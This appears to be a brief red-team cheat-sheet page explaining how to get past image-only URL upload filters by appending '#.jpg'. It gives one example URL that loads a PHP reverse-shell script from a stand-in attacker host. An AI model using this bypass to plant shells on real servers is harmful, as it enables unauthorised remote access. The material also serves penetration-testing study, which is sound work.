> For the complete documentation index, see [llms.txt](https://jeffgthompsons-organization.gitbook.io/red-team/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://jeffgthompsons-organization.gitbook.io/red-team/methodologies-and-resources/cheat-sheets/bypass-file-upload.md).

# Bypass File Upload

If the site accepts a URL but only accepts images, try adding **#** followed by the accept format, this way you are still uploading your file without modifying it as it cuts off everything after # &#x20;

**Browser**

```
http://$KALI:81/php-reverse-shell.php#.jpg
```
